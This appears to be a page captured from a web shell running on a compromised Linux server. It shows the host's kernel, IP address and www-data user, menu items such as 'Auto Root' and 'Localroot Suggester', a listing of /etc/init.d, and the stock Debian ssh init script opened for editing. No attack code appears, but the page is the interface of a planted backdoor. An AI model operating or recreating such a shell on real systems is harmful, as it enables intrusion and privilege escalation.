Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
init.d /
Delete
Unzip
Name
Size
Permission
Date
Action
anacron
2.01
KB
-rwxr-xr-x
2019-07-16 18:19
apache-htcacheclean
2.43
KB
-rwxr-xr-x
2020-09-30 23:09
apache2
7.95
KB
-rwxr-xr-x
2023-01-18 10:54
apparmor
3.65
KB
-rwxr-xr-x
2020-04-01 08:05
apport
2.22
KB
-rwxr-xr-x
2023-04-12 16:01
console-setup.sh
1.21
KB
-rwxr-xr-x
2023-02-24 01:24
cron
3.03
KB
-rwxr-xr-x
2024-02-27 02:22
dbus
3.08
KB
-rwxr-xr-x
2019-09-30 07:47
docker
2.88
KB
-rwxr-xr-x
2024-02-06 21:12
exim4
4.26
KB
-rwxr-xr-x
2024-01-27 00:52
fetchmail
7.74
KB
-rwxr-xr-x
2021-06-24 16:47
hwclock.sh
1.71
KB
-rwxr-xr-x
2022-02-20 23:13
keyboard-setup.sh
1.45
KB
-rwxr-xr-x
2022-12-31 16:35
kmod
2
KB
-rwxr-xr-x
2024-04-18 10:06
mariadb
8.26
KB
-rwxr-xr-x
2025-05-23 23:20
modules_dep.sh
674
B
-rwxr-xr-x
2021-05-05 00:37
mysql
8.26
KB
-rwxr-xr-x
2026-02-08 03:05
networking
4.42
KB
-rwxr-xr-x
2024-02-14 14:14
php7.4-fpm
4.19
KB
-rwxr-xr-x
2021-11-25 23:16
php8.1-fpm
4.19
KB
-rwxr-xr-x
2022-08-08 07:28
procps
959
B
-rwxr-xr-x
2022-02-25 11:32
quota
951
B
-rwxr-xr-x
2018-06-04 07:06
quotarpc
1.1
KB
-rwxr-xr-x
2018-06-04 07:06
resolvconf
3.9
KB
-rwxr-xr-x
2020-01-03 17:32
rsync
4.31
KB
-rwxr-xr-x
2021-10-28 16:36
saslauthd
10.35
KB
-rwxr-xr-x
2023-08-01 14:14
screen-cleanup
1.19
KB
-rwxr-xr-x
2017-05-21 19:04
ssh
3.96
KB
-rwxr-xr-x
2022-02-25 23:30
tor
5.93
KB
-rwxr-xr-x
2022-02-27 12:58
unattended-upgrades
1.36
KB
-rwxr-xr-x
2020-02-17 11:37
uuidd
1.28
KB
-rwxr-xr-x
2020-09-16 18:43
whoopsie
485
B
-rwxr-xr-x
2018-08-10 22:39
wide-dhcpv6-client
1.99
KB
-rwxr-xr-x
2016-10-26 14:20
x11-common
2.7
KB
-rwxr-xr-x
2021-10-19 09:04
xinetd
2.39
KB
-rwxr-xr-x
2018-02-05 18:31
Save
Rename
#! /bin/sh ### BEGIN INIT INFO # Provides: ssh sshd # Required-Start: $remote_fs $syslog # Required-Stop: $remote_fs $syslog # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: OpenBSD Secure Shell server ### END INIT INFO set -e # /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon test -x /usr/sbin/sshd || exit 0 ( /usr/sbin/sshd -\? 2>&1 | grep -q OpenSSH ) 2>/dev/null || exit 0 umask 022 if test -f /etc/default/ssh; then . /etc/default/ssh fi . /lib/lsb/init-functions if [ -n "$2" ]; then SSHD_OPTS="$SSHD_OPTS $2" fi # Are we running from init? run_by_init() { ([ "$previous" ] && [ "$runlevel" ]) || [ "$runlevel" = S ] } check_for_no_start() { # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists if [ -e /etc/ssh/sshd_not_to_be_run ]; then if [ "$1" = log_end_msg ]; then log_end_msg 0 || true fi if ! run_by_init; then log_action_msg "OpenBSD Secure Shell server not in use (/etc/ssh/sshd_not_to_be_run)" || true fi exit 0 fi } check_dev_null() { if [ ! -c /dev/null ]; then if [ "$1" = log_end_msg ]; then log_end_msg 1 || true fi if ! run_by_init; then log_action_msg "/dev/null is not a character device!" || true fi exit 1 fi } check_privsep_dir() { # Create the PrivSep empty dir if necessary if [ ! -d /run/sshd ]; then mkdir /run/sshd chmod 0755 /run/sshd fi } check_config() { if [ ! -e /etc/ssh/sshd_not_to_be_run ]; then # shellcheck disable=SC2086 /usr/sbin/sshd $SSHD_OPTS -t || exit 1 fi } export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" case "$1" in start) check_privsep_dir check_for_no_start check_dev_null log_daemon_msg "Starting OpenBSD Secure Shell server" "sshd" || true # shellcheck disable=SC2086 if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; stop) log_daemon_msg "Stopping OpenBSD Secure Shell server" "sshd" || true if start-stop-daemon --stop --quiet --oknodo --pidfile /run/sshd.pid --exec /usr/sbin/sshd; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; reload|force-reload) check_for_no_start check_config log_daemon_msg "Reloading OpenBSD Secure Shell server's configuration" "sshd" || true if start-stop-daemon --stop --signal 1 --quiet --oknodo --pidfile /run/sshd.pid --exec /usr/sbin/sshd; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; restart) check_privsep_dir check_config log_daemon_msg "Restarting OpenBSD Secure Shell server" "sshd" || true start-stop-daemon --stop --quiet --oknodo --retry 30 --pidfile /run/sshd.pid --exec /usr/sbin/sshd check_for_no_start log_end_msg check_dev_null log_end_msg # shellcheck disable=SC2086 if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; try-restart) check_privsep_dir check_config log_daemon_msg "Restarting OpenBSD Secure Shell server" "sshd" || true RET=0 start-stop-daemon --stop --quiet --retry 30 --pidfile /run/sshd.pid --exec /usr/sbin/sshd || RET="$?" case $RET in 0) # old daemon stopped check_for_no_start log_end_msg check_dev_null log_end_msg # shellcheck disable=SC2086 if start-stop-daemon --start --quiet --oknodo --chuid 0:0 --pidfile /run/sshd.pid --exec /usr/sbin/sshd -- $SSHD_OPTS; then log_end_msg 0 || true else log_end_msg 1 || true fi ;; 1) # daemon not running log_progress_msg "(not running)" || true log_end_msg 0 || true ;; *) # failed to stop log_progress_msg "(failed to stop)" || true log_end_msg 1 || true ;; esac ;; status) status_of_proc -p /run/sshd.pid /usr/sbin/sshd sshd && exit 0 || exit $? ;; *) log_action_msg "Usage: /etc/init.d/ssh {start|stop|reload|force-reload|restart|try-restart|status}" || true exit 1 esac exit 0